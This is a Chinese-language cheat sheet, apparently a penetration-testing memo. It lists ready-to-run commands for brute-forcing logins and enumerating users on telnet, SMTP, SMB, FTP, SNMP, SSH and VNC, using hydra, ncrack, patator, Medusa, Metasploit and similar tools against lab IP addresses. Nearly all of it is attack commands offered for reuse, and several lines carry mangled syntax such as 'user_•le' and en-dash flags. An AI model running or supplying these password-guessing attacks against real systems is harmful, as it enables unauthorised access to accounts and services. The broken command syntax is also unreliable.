本文對常見的系統服務的認證系統進行攻擊嘗試的方式做了彙總,使用到的工具主要包括 hydra、ncrack、patator、Metasploit 和 Medusa,這些工具預設在 kali 上已經安裝,可以直接使用,本文主要涉及的服務包括:telnet、SMTP、SMB、FTP、SNMP、SSH、VNC,關于工具的介紹和服務的介紹未進行講解,需自行查閱資料進行了解。
telnet
hydra
hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 telnet
-L
指定使用者名清單
-P
指定密碼清單
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLicmbw5CMjJDZ5MWO4EmYkFTYzU2MlBDMyUjMyQmN1QzYzUGNj9CX0JXZ252bj91Ztl2Lc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
Ncrack
ncrack –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23
-U
指定使用者名清單
-P
指定密碼清單
Patator
patator telnet_login host=192.168.1.106 inputs=‘FILE0\nFILE1’ 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re=‘Username: | Password:’
Metasploit
use auxiliary/scanner/telnet/telnet_login msf exploit (telnet_login)>set rhosts 192.168.1.106 (IP of Remote Host) msf exploit (telnet_login)>set user_•le /root/Desktop/user txt msf exploit (telnet_login)>set pass_•le /root/Desktop/pass.txt msf exploit (telnet_login)>set stop_on_success true msf exploit (telnet_login)> exploit
SMTP
telent
連接配接 25 端口:
telnet 192.168.1.107 25
枚舉使用者,結果傳回 550 則表示使用者不存在,結果傳回 250,251,252 表示使用者是有效的:
vrfy [email protected]
Metasploit
use auxiliary/scanner/smtp/smtp_enum msf auxiliary(smtp_enum) > set rhosts 192.168.1.107 msf auxiliary(smtp_enum) > set rport 25 msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt msf auxiliary(smtp_enum) > exploit
smtp-user-enum
smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107
-M
指定使用哪種方式枚舉,比如 EXPN, VRFY 或 RCPT
-U
指定使用者名清單
-t
指定目标主機 IP
指定郵箱字尾,使用者名清單隻需要名字即可,使用參數
-D
:
smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107
iSMTP
ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt
SMB
Hydra
hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb
Ncrack
ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445
Medusa
medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt
Metasploit
use auxiliary/scanner/smb/smb_login msf exploit (smb_login)>set rhost 192.168.1.118 msf exploit (smb_login)>set user_•le /root/Desktop/user.txt msf exploit (smb_login)>set pass_•le /root/Desktop/pass.txt msf exploit (smb_login)>set stop_on_success true msf exploit (smb_login)>exploit
FTP
Hydra
hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp
Ncrack
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21
Medusa
Medusa -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp
Patator
patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
Metasploit
use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)msf exploit (ftp_login)>set user_•le /root/Desktop/user.txt msf exploit (ftp_login)>set userpass_•le /root/Desktop/pass.txt msf exploit (ftp_login)>set stop_on_success true msf exploit (ftp_login)> exploit
SNMP
Hydra
hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp
Medusa
medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt
Metasploit
use auxiliary/scanner/snmp/snmp_login msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host) msf auxiliary(scanner/snmp/snmp_login)> set pass_•le /root/Desktop/pass.txt msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true msf auxiliary(scanner/snmp/snmp_login)> run
Nmap
nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp- brute.communitiesdb=/root/Desktop/pass.txt
Onesixtyone
onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt
SSH
Hydra
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ssh
Medusa
medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh
Ncrack
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103:22
Patator
patator ssh_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
Metasploit
use auxiliary/scanner/ssh/ssh_login msf exploit (ssh_login)>set rhosts 192.168.1.103 (IP of Remote Host) msf exploit (ssh_login)>set user_•le /root/Desktop/user.txt msf exploit (ssh_login)>set pass_•le /root/Desktop/pass.txt msf exploit (ssh_login)>exploit
VNC
Hydra
Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc
Metasploit
use auxiliary/scanner/vnc/vnc_login msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6 msf auxiliary(scanner/vnc/vnc_login) > set pass_•le /root/Desktop/pass.txt msf auxiliary(scanner/vnc/vnc_login) > run
Patator
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0
Medusa
Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc
Ncrack
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900
總結
整體來看,這些工具可以對除了以上幾種服務攻擊之外,還可以對其他更多的服務進行攻擊嘗試,比如資料庫服務中的 mssql、mysql、oracle 等,差異僅僅在于參數不同,這裡主要做個備忘,以備不時之需,沒啥技術含量,僅供參考。